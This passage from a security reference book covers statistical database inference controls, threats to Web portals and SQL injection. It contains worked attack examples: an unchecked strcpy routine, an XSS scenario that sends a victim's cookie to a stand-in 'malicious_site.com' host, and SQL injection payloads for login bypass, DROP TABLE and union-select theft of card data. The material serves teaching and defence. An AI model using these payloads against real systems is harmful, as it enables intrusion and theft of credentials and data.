These techniques protect against the aforementioned inference attacks by restricting queries that could reveal confidential data on individuals (Castano, 1996).
Query Set Size Control

Enforcing a minimum set size for returned information does not offer adequate protection, as we explained in Section 3's introductory example. Denning (1982) described trackers, which are sequences of queries that are all within the size limits allowed by the database; when combined with AND statements and negations, information on individuals can be inferred. While simple trackers require some background information (for instance, that Alice is the only female employee in department D1 who is older than 35), general trackers (Schlörer, 1980; Denning, 1979) can be used without in-depth background knowledge.
An Audit-Based Expanded Query Set Size Control

The general idea of this control is to store an “assumed information base,” that is, to keep a history of all the requests issued by the user. It is also referred to as query set overlap control (Adam, 1989). The system has to calculate all possible inferences (the assumed information base) that could be created based on all the queries the user has issued; for each new query it has to decide whether the query could be combined with the assumed information base to infer information that should remain confidential.
Perturbation-Based Techniques

Perturbation-based techniques are characterized by modifying the data so that the privacy of individuals can still be guaranteed even if more
Figure 2. Generic architecture of data flows to a data warehouse: source data layer → data transformation layer → data warehouse and reporting layer
detailed data is returned than in restriction-based techniques. The data can be modified either in the original records or in the results returned.
Data Swapping

Data is exchanged between different records so that no original record remains intact, but in a way that the calculated statistics are not affected.
Random Sample Queries

The set of answers to a specific query is created dynamically so that not all relevant data items are included in the answer. Instead, a random subset is returned. Since the user cannot decide how this random sample is drawn, inference attacks are much harder. By issuing similar queries, an attacker can attempt to remove the sampling errors. Such attacks are feasible for small data sets; large data sets can be adequately protected by using random sample queries.
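A rough sketch of the idea (PostgreSQL-style TABLESAMPLE; the table is hypothetical) answers each statistical query from a fresh random subset of the rows rather than from the full query set:

-- Each execution draws a different ~20% Bernoulli sample of the table,
-- so repeated queries cannot be combined into an exact tracker.
SELECT AVG(salary)
FROM   employees TABLESAMPLE BERNOULLI (20)
WHERE  department = 'D1';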
Fixed Perturbation (Modify Data)

Unlike the random sample query approach, data modifications and selections are not performed dynamically for each query. Instead, data is modified (though not swapped) as soon as it is stored in the database. The modifications are performed in such a way that they do not significantly influence statistical results.
Query-Based Perturbation

In contrast to fixed perturbation, query-based perturbation modifies data, as the name suggests, for each query dynamically. The advantage is that the amount of perturbation, and thus the accuracy, can be varied individually for different users. More trustworthy users can receive more precise results.
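A deliberately simplified sketch of this idea (PostgreSQL random(); the table is hypothetical, and the noise scale of 2.0 stands for a per-user parameter that would be smaller for more trusted users) adds fresh noise to every answer instead of perturbing the stored data:

-- The true aggregate is never returned; each query gets an independently
-- perturbed answer whose accuracy depends on the caller's trust level.
SELECT AVG(age) + (random() - 0.5) * 2.0 AS perturbed_avg_age
FROM   patients
WHERE  region = 'North';

Real schemes use carefully calibrated noise distributions; the point here is only that the perturbation happens per query, not per stored record.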
FUTURE TRENDS

According to Mukherjee et al. (2006), the problem with perturbation techniques is that Euclidean-distance-based mining algorithms no longer work well, that is, distances between data points cannot be reconstructed. The authors propose to use Fourier-related transforms to obscure sensitive data, which helps to preserve the original distances at least partly. Another approach, proposed by Domingo-Ferrer et al. (2006), is to aggregate data from the original database in small groups. Since this aggregation is done prior to publishing the data, the data protector can decide how large such a “micro” group should be.
CONCLUSION

In the previous sections we gave a detailed introduction to access control and focused on role-based access control. RBAC is currently the dominant access control model for database systems. While access control is certainly one of the most fundamental mechanisms to ensure that security requirements such as confidentiality, integrity, and, at least to some extent, availability are implemented, there are several other aspects that need to be considered, too. Figure 2 shows how data is extracted from the source databases, transformed, and loaded into the data warehouse. It may then be used for analysis and reporting. The transactional database can be secured with the “classical” models of database security such as RBAC or even mandatory access control. Research in this area dates back to the early times of (military) databases in the 1960s. Once data is extracted, transformed, and loaded into a DWH, the data will be used in data analysis, which is what a DWH is created for in the first place. DWH security and methods of statistical database security are then used to
secure the DWH against attacks such as inference. Nonetheless, overall security can be achieved only by securing all possible attack vectors, not only the operational database (source data) and the DWH itself. It is essential to secure all of the servers, including remote, file, and physical access, and to thoroughly understand all communication and transformation processes. Attacks could be launched before or after data is transformed, when it is stored in the data warehouse, or when it is being retrieved.
REFERENCES

Adam, N. R., & Worthmann, J. C. (1989). Security-control methods for statistical databases: A comparative study. ACM Computing Surveys, 21(4), 515-556. Retrieved from http://doi.acm.org/10.1145/76894.76895

Bell, D., & LaPadula, L. (1975). Secure computer system: Unified exposition and Multics interpretation. The MITRE Corporation.

Bertino, E., Khan, L. R., Sandhu, R., & Thuraisingham, B. (2006). Secure knowledge management: Confidentiality, trust, and privacy. IEEE Transactions on Systems, Man, and Cybernetics, Part A: Systems and Humans, 36, 429-438.

Böck, B., Klemen, M., & Weippl, E. R. (2007). Social engineering. Accepted for publication in The Handbook of Computer Networks.

Denning, D. E. (1982). Cryptography and data security. Addison-Wesley.

Denning, D. E., & Denning, P. J. (1979). The tracker: A threat to statistical database security. ACM Transactions on Database Systems, 4(1), 76-96. Retrieved from http://doi.acm.org/10.1145/320064.320069

Domingo-Ferrer, J., Martinez-Balleste, A., Mateo-Sanz, J. M., & Sebe, F. (2006). Efficient multivariate data-oriented microaggregation. The VLDB Journal, 15, 355-369.

Mukherjee, S., Chen, Z., & Gangopadhyay, A. (2006). A privacy-preserving technique for Euclidean distance-based mining algorithms using Fourier-related transforms. The VLDB Journal, 15, 293-315.

Osborn, S., Sandhu, R. S., & Munawer, Q. (2000). Configuring role-based access control to enforce mandatory and discretionary access control policies. ACM Transactions on Information and System Security, 3(2), 85-106.

Park, J., & Sandhu, R. (2004). The UCONABC usage control model. ACM Transactions on Information and System Security, 7, 128-174.

Sandhu, R. S., Coyne, E. J., Feinstein, H. L., & Youman, C. E. (1996). Role-based access control models. IEEE Computer, 29(2), 38-47. Retrieved from http://csdl.computer.org/comp/mags/co/1996/02/r2toc.htm

Sandhu, R. S., Ferraiolo, D., & Kuhn, R. (2000, July). The NIST model for role-based access control: Towards a unified standard. Proceedings of the 5th ACM Workshop on Role-Based Access Control, 47-63.

Schlörer, J. (1980, December). Disclosure from statistical databases: Quantitative aspects of trackers. ACM Transactions on Database Systems, 5(4).

Thuraisingham, B. (2002). Data mining, national security, privacy and civil liberties. SIGKDD Explorations, 4(2), 1-5.

Thuraisingham, B. (2005). Privacy constraint processing in a privacy-enhanced database management system. Data & Knowledge Engineering, 55, 159-188.
KEY TERMS

Availability: A system or service is available to authorized users.

CIA: Confidentiality, integrity, availability; the three most basic security requirements.

Confidentiality: Only authorized subjects should have read access to information.

DWH: Data warehouse.

ETL: The process of extracting, transforming (or transporting), and loading source data into a DWH.

Integrity: No unauthorized modifications, or modifications by unauthorized subjects, are made.

OLAP: Online analytical processing.
This work was previously published in Encyclopedia of Data Warehousing and Mining, Second Edition, edited by J. Wang, pp. 610-616, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 7.8
Security Threats in Web-Powered Databases and Web Portals
Theodoros Evdoridis
University of the Aegean, Greece
Theodoros Tzouramanis
University of the Aegean, Greece
INTRODUCTION

It is a strongly held view that the scientific branch of computer security that deals with Web-powered databases (Rahayu & Taniar, 2002) that can be accessed through Web portals (Tatnall, 2005) is both complex and challenging. This is mainly due to the fact that there are numerous avenues available for a potential intruder to follow in order to break into the Web portal and compromise its assets and functionality. This is of vital importance when the assets that might be jeopardized belong to a legally sensitive Web database, such as that of an enterprise or government portal containing sensitive and confidential information. It is obvious that the aim of not only protecting against, but also preventing, potential malicious or accidental activity that could put a Web portal's assets in danger requires an attentive
examination of all possible threats that may endanger the Web-based system.
BACKGROUND

Security incidents have been bound to the Internet since its very start, even before its transition from a government research project to an operational network. Back in 1988, the ARPANET, as it was then called, had its first automated network security incident, usually referred to as “the Morris worm.” A student at Cornell University (Ithaca, NY), Robert T. Morris, wrote a program that would connect to another computer, find and use one of several vulnerabilities to copy itself to that second computer, and begin to run the copy of itself at the new location (CERT Coordination Center Reports, 2006). In 1989, the ARPANET
officially became the Internet, and security incidents employing more sophisticated methods became more and more apparent. Among the major security incidents were the 1989 WANK/OILZ worm, an automated attack on VMS systems attached to the Internet, and the exploitation of vulnerabilities in widely distributed programs such as the sendmail program (CERT Coordination Center Reports, 2006). However, without underestimating the impact that such past incidents had on all involved parties, analysts maintain that the phenomenon has significantly escalated, not only with respect to the number of incidents but mostly with respect to their consequences. The most notorious representative of this new era of cyber crime is the CardSystems incident (Web Application Security Consortium, 2006). In that crime scheme, hackers managed to steal 263,000 credit card numbers, expose 40 million more, and proceed to purchases worth several million dollars using these counterfeit cards. CardSystems is considered by many the most severe publicized information security breach ever, and it caused company shareholders, financial institutions, and card holders damages of millions of dollars. The latest security incident occurred on April 25, 2006, when a hacker successfully managed to abuse a vulnerability in the Horde platform to penetrate the site owned by the National Security Agency of the Slovak Republic, jeopardizing sensitive information (Web Application Security Consortium, 2006).
LEGALLY SENSITIVE WEB-POWERED DATABASES

Even though legally sensitive portals, in other words, Web portals containing legally sensitive data, were not included in the Web portal family until the late 1990s (Wikipedia.org, 2006), this addition signaled the
beginning of a new era in the Web portal scientific field. More specifically, portals took a converse approach with respect not only to the nature of the services that they offered but also to the target group to which these services were offered. The end user, from the perspective of the Web portal, was no longer exclusively the anonymous user, but could also be a very specific individual whose personalization data were frequently hosted inside the portal itself. These types of portals, while often operating like ordinary Web portals serving millions of unaffiliated users, utilised some of their privately accessed aspects to harmonise the communications and workflow inside the corporation. This innovative approach proved to be both a money- and labour-saving initiative (Oracle Corporation, 2003). On the other hand, government portals aimed at supporting, instructing, and aiding citizens in various socially oriented activities proved to be an important step towards the information society era. It is obvious that these kinds of portals, playing such an important role in the social or enterprise context, could not operate without information of equivalent potential and importance. As a result, the aforementioned Web portals were powered by databases hosting information of extreme fragility and sensitivity, a fact that inescapably attracted various non-legitimate users, driven by ambition, challenge, or malice, who aimed to compromise the information, mangle the Web portal, and make it non-operational. To impede all possible attacks against the Web portal and the hosted information, it is considered wise to identify all possible actions that could threaten and distort their functionality. The most ordinary Web portal architecture is examined and a threat area is defined, partitioned into four different sections, each of which relates to a corresponding point of breaking into the Web portal's normal operation.
System’s Architecture
Web portals of all types have been designed to take advantage of a Web server and, through it, to retrieve all data hosted in a database, which in turn is accessed by a database server (Microsoft Corporation, 2003). The term “Web application” is commonly used to represent the set of servers whose combined operation is perceived as the service requested by the end user. An application of this philosophy is usually called a three-tier application: the database tier contains the database server and is responsible for writing data in and out of the database; the Web tier hosts the Web server and is accountable for establishing connections and data transmission with the database server; and the client tier, in which the leading role is played by the client's Web browser, provides an interface that allows the user to receive an answer to her/his request from the Web portal. From a protocol point of view, communications between the client and the Web server use the HTTP protocol. Communication between the Web and database servers, on the other hand, is achieved through the application programming interface ODBC. This architecture is illustrated by the diagram in Figure 1.

THREATS

Information hosted in, and distributed by, a Web portal, not necessarily legally sensitive, during a transaction session between the end user and the organization's systems, flows back and forth from the client through the network, usually the Internet, to the organization's respective server or servers that constitute the Web portal. A precondition for the latter's undisturbed and optimal operation is the absolute protection of the information, both stored and in propagating form (Splain, 2002). Protecting a legally sensitive portal requires ensuring that no attack can take place on the database server, the Web server, the Web application, the external network, and the underlying operating systems of the host computers.
Network Level Threats

The most important network level threat for the Web-powered database server and for the Web portal's operation is sniffing (Splain, 2002). Sniffing is the act of capturing confidential information, such as passwords, that is transmitted through an unsafe external network such as the Internet, using special hardware and/or software components.
Figure 1. Three-tier architecture: the client (tier 1) communicates over HTTP across the external network with the Web server (tier 2), which communicates via ODBC across the internal network with the database server (tier 3)
Another significant threat is the so-called spoofing attack (Zdnet.com, 2002). This form of attack aims at hiding the true identity of a computer system in the network. Using this form of attack, a malicious individual can use an IP address that belongs to a legitimate user's computer as her/his own in order to gain unauthorised access to the Web portal's resources. An equally significant threat is so-called session hijacking (Zdnet.com, 2002), or the man-in-the-middle attack. Through this technique, the Web server is deceived into accepting information flow from an unauthorised system, and wrongfully transmits the information derived from the database to this system. A last kind of attack is tampering. This attack involves capturing a message and transmitting a fake one in its place, or transforming the data transmitted through the network into a form that is incomprehensible to the authorised receiver.
Host Level Threats

One of the most common threats at host level is the virus threat. A virus is a computer program that is designed to perform malicious acts and corrupt a computer system's operating system or other applications, exploiting bugs found in these programs. There are various breeds of viruses, such as Trojan horses, which are programs that appear harmless because their malicious code is not apparent to a non-extensive inspection, and worms, which are viruses that have the ability to duplicate themselves from one computer system to another using the shared network. Another crucial form of threat is the denial-of-service threat. This threat aims at stopping any of the Web portal's operational components from functioning. Common methods for achieving a denial-of-service (Wikipedia.org, 2006) status are releasing a virus on a host computer, sending a huge amount of ICMP requests (ping of death) to
the host, or using special software to perform a thousand HTTP requests for resources per second on the Web server (SYN-Flood). An important threat is unauthorised direct access to the Web portal's hosts. Insufficient access control mechanisms may allow a non-registered user to gain access to the operating system's resources, a fact that may expose information of critical importance. An example is the Windows operating system, which stores SQL Server's security parameters in the system's registry file. Additionally, an attacker taking advantage of a careless configuration of the database server may perform direct queries, causing it significant problems. Many RDBMS software systems include default accounts that administrators neglect to deactivate, allowing attackers to gain easy access to the database.
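A basic hardening step against this last risk, sketched below in Oracle-flavoured SQL (the locked account name is the classic demo account; the application account, password, and table are hypothetical, and other DBMS use equivalents such as DROP USER or disabling logins), is to lock default accounts and have the portal connect through a dedicated, least-privilege account rather than an administrative one:

-- Lock a well-known default account instead of leaving it enabled:
ALTER USER scott ACCOUNT LOCK;

-- Create a dedicated, least-privilege account for the Web application:
CREATE USER portal_app IDENTIFIED BY StrongPassw0rd;
GRANT SELECT, INSERT, UPDATE ON patient_record TO portal_app;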
Application Level Threats One of the most vital parts of a Web application is the one that accepts user-entered data. Threats in this specific category exist when the attacker realizes that the application generates unreliable assumptions regarding the size and type of userinserted data (Oppliger, 2002). In the context of this category of threats, the attacker inserts specific input in order to force the application to achieve her/his purpose. A common threat of this category is the buffer overflow threat. When a threat of this kind is aimed, it gives the opportunity to the attacker to launch a denial-of-service attack, neutralizing the computer that runs the Web application. The following example depicts a faulty routine that copies a user-entered username to buffer for further processing. The function depicted in Figure 2 receives user input and copies its contents to a character array capable of storing input up to 10 characters. This character array represents an application container to store this input for further processing. The problem lies in the fact that the application copies user input to the container, without prior
Security Threats in Web-Powered Databases and Web Portals
Figure 2. A faulty routine for copying user entered data void a_function(char *username) { char buffer[10]; strcpy(buffer,username); /* input is copied to buffer without prior checking its size */ }
examination of its size. In this case, if the input exceeds 10 characters in length, a buffer overflow will occur. One of the most dangerous threats known to the Web security community is cross-site scripting, also known as XSS (Morganti, 2006). It is an attack technique that forces a Web site to echo client-supplied data, which then executes in a user's Web browser. When a user is cross-site scripted, the attacker gains access to all Web browser content (cookies, history, application version, etc.). Cross-site scripting occurs when an attacker manages to inject script code such as JavaScript or VBScript into a Web site, causing it to execute the code. Usually this is done by constructing a specially crafted link and sending it, explicitly via e-mail or implicitly by posting it to a forum, to an unsuspecting victim. Upon clicking the malicious link, the piece of script code embedded in it is executed. Imagine that an attacker has a potential victim in mind and knows that the victim uses a shopping portal. This Web site allows users to have an account from which they can buy things without having to enter their credit card details every time they wish to purchase something. Furthermore, in order to be user friendly, the portal uses cookies to store user credentials so that the user does not have to enter a username and a password for each resource requested during a session. The attacker knows that if she/he can get the user's cookie, she/he would
be able to buy things from this online store using the victim's credit card. She/he then constructs the link that appears in Figure 3. The user would of course click the link and be led to the CNN news article, but at the same time the attacker would have been able to direct the user's browser to her/his specially crafted URL "http://malicious_site.com", and specifically to the steal.cgi Web page, which is constructed to receive as an argument "document.cookie", the user's cookie, and save it on the attacker's computer. The attacker now refreshes the page, gains access to the victim's account, and the victim is billed for everything the attacker might buy. Another common threat is known as SQL injection (Spett, 2002), which takes place on the database layer of the Web application. Its source is the incorrect escaping of string literals embedded in SQL statements that are dynamically generated from user input. Assume that the following code is embedded in an application. The value of the variable username is assigned from a user input parameter, for example the value of an HTTP request variable or HTTP cookie. The code that appears in Figure 4 naively constructs a SQL statement by appending the user-supplied parameter to a SELECT statement. If the input parameter is manipulated by the user, the SQL statement may do more than the
Figure 3. A maliciously crafted link for capturing the user's cookie; the link text displayed to the victim reads "Check this Article Out!"
Figure 4. A carelessly written statement for creating dynamic SQL statements
query = "SELECT * FROM users WHERE name='" + username + "'";
Figure 5. An exploited statement that indirectly forces the SQL engine to drop a database table
query = "SELECT * FROM users WHERE name='whatever'; DROP TABLE users;--'";
code author intended. For example, if the input parameter supplied is whatever'; DROP TABLE users;--, the code of Figure 4 builds the SQL statement that appears in Figure 5. When sent to the database, this statement is executed and the users table is removed. Another vital part of the interaction between the database and the Web portal is authentication and authorization. Depending on the Web application, various authentication mechanisms are employed. Nevertheless, if an authentication scheme is not properly selected and applied, it can lead to significant problems. One threat that belongs to this group is the use of weak credentials. Even though many systems store the
hashed versions of passwords in the database, an attacker can use a sniffing attack to capture the hashed password and then perform an off-line brute force attack which, supported by appropriate computing power and one or more dictionaries, is likely to recover the user's password. A threat that also falls into this category is the cookie replay attack. Here, the attacker captures the authorization cookie of a legitimate user, which lets the user access all the portal's resources without submitting her/his credentials every time a new resource is requested, and replays it afterwards to bypass the authentication procedure.
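A common mitigation against such off-line brute force attacks, not detailed in this article, is to store passwords as salted, iterated hashes rather than plain one-way hashes. The following minimal sketch uses Python's standard hashlib, hmac, and os modules; the example password is invented and the code is illustrative only.

import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=100000):
    # A random per-user salt defeats precomputed dictionaries; many iterations
    # slow down every guess in an off-line brute force attack.
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest

def verify_password(candidate, salt, stored_digest, iterations=100000):
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(digest, stored_digest)

salt, digest = hash_password("45dc&vg3")
print(verify_password("45dc&vg3", salt, digest))    # True
print(verify_password("wrong-guess", salt, digest)) # False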
Physical and Insider Threats
This group of threats is often wrongfully underestimated, with dramatic results (Tipton & Krause, 2004). Physical attacks occur when people break into the vendor's facilities and gain access to the computers that host the legally sensitive portal. If this takes place and the malicious user manages to stand side by side with the host computer, no security scheme can prevent a violation that may range from physical destruction of the computer to stealing data and opening backdoors for later remote access. Apart from that, insider attacks performed by supposedly trusted personnel are even more difficult to prevent, as certain employees have to overcome far fewer obstacles in order to get their hands, or the hands of an external accomplice, on the portal's resources.

CONCLUSION

Legally sensitive Web-powered databases and portals represent a great asset in all conceivable aspects of the social and the commercial world. With a range varying from multinational enterprises to local organizations and individuals, this category lies at the epicentre of worldwide interest. The problem is that this interest is not always legitimate. Malicious operations that break into the portal's assets can have consequences ranging from a minor loss of time in recovering from the problem, and a corresponding decrease in productivity, to a significant loss of money and a devastating loss of credibility. Furthermore, considering that no one on the Internet is immune, it is of utmost importance to persevere with the task of securing a system that contains sensitive information.
FUTURE TRENDS

According to scientific estimates, more than 100,000 new software vulnerabilities will be discovered by 2010 (Iss.net, 2005). This can be translated into the discovery of one new bug every five minutes of every hour of every day until then. As programs and applications become more sophisticated and provide more advanced features, their complexity will increase accordingly. Experts also estimate that in the next five years the Microsoft Windows operating system will approach 100 million lines of code, and the software installed on an average user's computer will contain a total of about 200 million lines of code and, within it, 2 million bugs. Adding to this the fact that another half a billion people will have joined the Internet user population by that year, and that a non-negligible number of them will be malicious users, the future is worrying.

REFERENCES
CERT Coordination Center Reports (2006). Security of the Internet. Retrieved January 8, 2007, from http://www.cert.org/encyc_article/tocencyc.html

Iss.net (2005). The future landscape of Internet security according to Gartner, Inc. Retrieved January 8, 2007, from http://www.iss.net/resources/pescatore.php

Microsoft Corporation (2003). Improving Web application security: Threats and countermeasures. Microsoft Press.

Morganti, C. (2006). XSS attacks FAQ. Retrieved January 8, 2007, from http://astalavista.com/media/directory06/uploads/xss_attacks_faq.pdf

Oppliger, R. (2002). Security technologies for the World Wide Web (2nd ed.). Artech House Publishers.
Oracle Corporation (2003). Transforming government: An e-business perspective (Tech. Rep.). Retrieved January 8, 2007, from http://www.oracle.com/industries/government/Gov_Overview_Brochure.pdf

Rahayu, J. W., & Taniar, D. (2002). Web-powered databases. Hershey, PA: Idea Group Publishing.

Spett, K. (2002). SQL injection: Is your Web application vulnerable? (Tech. Rep.). SPI Dynamics Inc.

Splain, S. (2002). Testing Web security: Assessing the security of Web sites and applications. Wiley.

Tatnall, A. (2005). Web portals: The new gateways to Internet information and services. Hershey, PA: Idea Group Reference.

Tipton, H. F., & Krause, M. (2004). Information security management handbook (5th ed.). Boca Raton, FL: CRC Press.

WBDG.org (2005). Provide security for building occupants and assets. Retrieved January 8, 2007, from http://www.wbdg.org/design/provide_security.php

Web Application Security Consortium. (2006). Retrieved January 8, 2007, from http://www.webappsec.org/projects/whid/list_year_2006.shtml

Wikipedia.org. (2006). Retrieved January 8, 2007, from http://en.wikipedia.org/wiki/Main_Page

Zdnet.com. (2002). Database security in your Web enabled apps. Retrieved January 8, 2007, from http://www.zdnet.com.au/builder/architect/database/story/0,2000034918,20268433,00.htm
KEY TERMS

Advanced Research Projects Agency Network (ARPANET): It was the world's first operational packet switching network, and the progenitor of the Internet. It was developed by the U.S. Department of Defense.

Cookie: It is a small packet of information stored on users' computers by Web sites, in order to uniquely identify the user across multiple sessions.

Cybercrime: It is a term used broadly to describe criminal activity in which computers or networks are a tool, a target, or a place of criminal activity.

Database: It is an organized collection of data (records) that are stored in a computer in a systematic way, so that a computer program can consult it to answer questions. The database model in most common use today is the relational model, which represents all information in the form of multiple related tables, every one consisting of rows and columns.

Database Server: It is a computer program that provides database services to other computer programs or computers, as defined by the client-server model. The term may also refer to a computer dedicated to running such a program.

Horde: It is a PHP-based Web application framework that offers a broad array of applications. These include, for example, a Web-based e-mail client; groupware (calendar, notes, tasks, file manager); a Web site that allows users to add, remove, or otherwise edit and change all content very quickly; and time and task tracking software.

Internet Control Message Protocol (ICMP): It is one of the core protocols of the Internet
Protocol Suite. It is chiefly used by networked computers’ operating systems to send error messages, indicating for instance that a requested service is not available or that a host or router could not be reached. Sendmail: It is a mail transfer agent (MTA) that is a well known project of the open source
and Unix communities and is distributed both as free and proprietary software. Web Server: It is a computer program hosted in a computer that is responsible for accepting HTTP requests from clients, which are known as Web browsers, and serving them Web pages, which are usually HTML documents.
This work was previously published in Encyclopedia of Portal Technologies and Applications, edited by A. Tatnall, pp. 869-874, copyright 2007 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 7.9
SQL Code Poisoning:
The Most Prevalent Technique for Attacking Web Powered Databases

Theodoros Tzouramanis
University of the Aegean, Greece
ABSTRACT

This chapter focuses on the SQL code poisoning attack. It presents various ways in which a Web database can be poisoned by malicious SQL code, which can result in the compromise of the system. Subsequently, techniques are described for the detection of SQL code poisoning and a number of lockdown issues that are related to this type of attack are discussed. This chapter also reviews security mechanisms and software tools that protect Web applications against unexpected data input by users; against alterations of the database structure; and against the corruption of data and the disclosure of private and confidential information, all of which are owed to the susceptibility of these applications to this form of attack.
INTRODUCTION

Web application attacks are continuously on the rise, posing new risks for any organization that
has an "online presence." The SQL code poisoning or SQL injection attack (CERT, 2002) is one of the most serious threats faced by database security experts. Today it is the most common technique used for attacking Web-powered databases indirectly and for effectively undermining the secrecy, integrity, and availability of Web applications. The basic idea behind this insidious and pervasive attack is that predefined logical expressions within a predefined query can be altered simply by injecting operations that always result in true or false statements. With this simple technique, the attacker can run arbitrary SQL queries and thus extract sensitive customer and order information from e-commerce applications, or bypass strong security mechanisms and compromise the backend databases and the file system of the data server. Despite these threats, a surprisingly high number of systems on the Internet are totally vulnerable to this attack. This chapter focuses on the SQL code poisoning attack. It presents various ways in which a Web database can be poisoned by malicious SQL
code, which can result in the compromise of the system. Subsequently, techniques are described for the detection of SQL code poisoning and a number of lockdown issues that are related to this type of attack are discussed. This chapter also reviews security mechanisms and software tools that protect Web applications against unexpected data input by users; against alterations of the database structure; and against the corruption of data and the disclosure of private and confidential information, all of which are owed to the susceptibility of these applications to this form of attack.
In order to perform SQL code poisoning, all an attacker needs is a Web browser and some guesswork to find important table and field names. This is why SQL code poisoning is one of the most common application layer attacks currently being used on the Internet. The inventor of the attack is Rain Forest Puppy, a former hacker and, today, a security advisor to international software development companies.
BACKGROUND

Online businesses and organizations are protected these days by some kind of software or hardware firewall solution (Theriault & Newman, 2001). The purpose of the firewall is to filter network traffic that passes into and out of the organization's network, limiting the use of the network to permitted, "legitimate" users. One of the conceptual problems with relying on a firewall for security is that the firewall operates at the level of IP addresses and network ports. Consequently, a firewall does not understand the details of higher level protocols such as hypertext transfer protocol, that is, the protocol that runs the Web applications. There is a whole class of attacks that operate at the application layer and that, by definition, pass straight through firewalls. SQL code poisoning is one of these attacks. It takes advantage of nonvalidated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database, that is, the heart of most Web applications. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. Therefore, the attacker can execute malicious SQL queries on the backend database server through the Web application.

THE SQL CODE POISONING ATTACK

SQL Code Poisoning Principles
SQL code poisoning is a particularly insidious attack since it transcends all of the good planning that goes into a secure database setup and allows malicious individuals to inject code directly into the database management system (DBMS) through a vulnerable application (Spett, 2002). The basic idea behind this attack is that the malicious user counterfeits the data that a Web application sends to the database aiming at the modification of the SQL query that will be executed by the
Figure 1. A typical user login form in a Web application
DBMS. This falsification seems harmless at first glance, but it is actually exceptionally vicious. One of the most worrying aspects of the problem is that a successful SQL code poisoning attack is very easy to accomplish, even if the developers of the Web application are aware of this type of attack. Web programming technologies vulnerable to the SQL code poisoning attack include the dynamic scripting languages ASP, ASP.NET, PHP, JSP, CGI, and so forth (Anupam & Mayer, 1998). Imagine, for example, the typical username and password entry form of a Web application that appears in Figure 1. When the user provides their credentials, ASP (Active Server Pages) code similar to the one that appears in Figure 2 might produce the SQL query that will certify the user's identity. In practice, when the user types a combination of a valid login name and password, the application confirms them by submitting a corresponding SQL query against some table USERS with two columns: the column username and the column password. The most important part of the code of Figure 2 is the line:

str_query = "select * from USERS where username = '" + text_username + "' and password = '" + text_password + "'";

The query is sent to the database for execution. The values of the variables text_username and text_password are provided by the user. For example, if the user types:

username: george
password: 45dc&vg3

the SQL query that is produced is:

select * from USERS where username = 'george' and password = '45dc&vg3';

which means that if this pair of username and password is stored in the table USERS, the authentication is successful and the user is admitted to the private area of the Web application. If, however, the malicious user types the following unexpected values into the entry form:
Figure 2. An ASP code example that manages the users’ login requests in a database through a Web application
username: george
password: anything' or '1' = '1'

then the dynamic SQL query is:

select * from USERS where username = 'george' and password = 'anything' or '1' = '1';

The expression '1' = '1' is always true for every row in the table, and a true expression connected with "or" to another expression will always return true. Therefore, the database returns all the tuples of the table USERS. Then, provided that the Web application received certain tuples for an answer, it concludes that the user's password is "anything" and permits her/his entry. In the worst case, the Web application presents on the screen of the malicious user all the tuples of the table USERS, which is to say all the usernames with their passwords. If the malicious user knows the whole or part of the login name of a user, they can log on without knowing the password, by entering a username like the following:

username: ' or username = 'admin'; --
password:

The "--" sequence begins a single-line comment in Transact-SQL, so in a Microsoft SQL Server environment everything after that point in the query will be ignored. By similar expressions the malicious user can change a user's password, drop the USERS table, or create a new database: they can effectively do anything that can be expressed as an SQL query which the Web application has the privilege of executing, including running arbitrary commands, creating and running DLLs within the DBMS process, shutting down the database server, or sending all the data off to some server out on the Internet.

Poisoning the URL

An SQL code poisoning attack can also be performed by using URL parameters. When a user enters the URL http://www.mywebapplication.com/products.asp?Pid=158, an SQL query similar to the following is executed:

select Pname, Pdetails from PRODUCTS where PID = 158

An attacker may abuse the fact that the PID parameter is passed to the database without sufficient validation by manipulating the parameter's value to build malicious SQL statements. For example, setting the value "158 or 1=1" to the PID variable may result in the following URL:

http://www.mywebapplication.com/products.asp?Pid=158%20or%201=1

Each "%20" in the URL represents a URL-encoded space character, so the URL actually looks like this:

http://www.mywebapplication.com/products.asp?Pid=158 or 1=1

The corresponding SQL statement is:

select Pname, Pdetails from PRODUCTS where PID = 158 or 1=1
This condition is always true, so the Pname and Pdetails values of all products are returned. The attacker can manipulate the application even further by inserting malicious commands. For example, in the case of Microsoft SQL Server, an attacker can craft a request that targets the name of the products table. Such a request would produce the following error in the Web browser:

Column 'PRODUCTS.PID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /products.asp, line 22

Now that the attacker knows the name of the products table ('PRODUCTS'), they can modify its contents or drop the entire table by calling up the following URL in the browser:

http://www.mywebapplication.com/products.asp?Pid=158;%20drop%20table%20PRODUCTS

An attacker may use SQL code poisoning to retrieve data from other tables as well. This can be done using the SQL "union select" statement, which allows the chaining of the results of two separate SQL select queries. For example, an attacker can request the following URL:

http://www.mywebapplication.com/products.asp?Pid=158%20union%20select%20number,%20expires_end%20from%20CREDITCARDS%20where%20type='visa'

causing the execution of the following SQL query:

select Pname, Pdetails from PRODUCTS where PID = '158' union select number, expires_end from CREDITCARDS where type='visa';
The result of this query is a table with two columns, containing the results of the first and second queries, respectively.
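The effect of such naive parameter handling can be made concrete with a small simulation. The following sketch recreates the products page in Python with the standard sqlite3 module; the table contents are invented and the setting differs from the chapter's ASP/SQL Server examples, so it is an illustration of the mechanism rather than the application discussed above.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE PRODUCTS (PID INTEGER, Pname TEXT, Pdetails TEXT)")
conn.executemany("INSERT INTO PRODUCTS VALUES (?, ?, ?)",
                 [(158, "Keyboard", "Wireless"),
                  (159, "Mouse", "Optical"),
                  (160, "Monitor", "19 inch")])

def products_page(pid_param):
    # Vulnerable pattern: the URL parameter is pasted directly into the SQL text.
    query = "SELECT Pname, Pdetails FROM PRODUCTS WHERE PID = " + pid_param
    return conn.execute(query).fetchall()

print(products_page("158"))         # one product, as intended
print(products_page("158 or 1=1"))  # the poisoned value returns the whole table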
Advanced SQL Code Poisoning Techniques

